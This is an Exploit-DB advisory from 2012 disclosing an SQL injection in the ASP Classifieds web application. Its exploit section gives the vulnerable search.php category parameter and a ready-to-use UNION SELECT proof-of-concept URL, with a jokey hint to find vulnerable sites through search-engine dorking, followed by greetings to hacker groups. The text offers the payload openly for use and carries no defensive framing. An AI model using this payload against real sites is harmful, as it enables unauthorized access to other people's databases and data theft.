ASP Classifieds - SQL Injection

EDB-ID:

18613


Author:

r45c4l

Type:

webapps


Platform:

PHP

Date:

2012-03-17


# Exploit Title: ASP Classifieds Sql Injection
# Date: 17/03/2012
# Author: r45c4l
# Email: infosecpirate@gmail.com
# Script url: http://preproject.com/pclasp/home/default.asp
# Version: N/A
# CVE : ()

::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

Product Description :

ASP Classifieds is one of the most customizable Classified ad program
that exist for ASP and Access. Unlimited Images , unlimited categories
and much much more makes it perfect for those who wants to set up a used
stamps classifieds to those wanting to show and sell real estates. 


Product Cost : 58$



=======================Exploit====================================
                      ---ICW---
                                        
                                        
                                        
[ EXPL0!T ]

SQL Injection
p0c -
http://SERVER/classi/search.php?category=[SQli]

PoC - 

http://SERVER/classi/search.php?category=-1+union+all+select+version()--

[Note: Tested on demo website]

d0rk - use your brain ;)

===========================================================================
Greetz to : Beenu Arora, Godwin Austin, Eberly, b0nd, the_empty_, micr0,
Hoody, sam

All members of ICW, AH and darkc0de, and all Indian Hackers



Special Greetz to : b4ltazar and s1nner_01


=== End () ====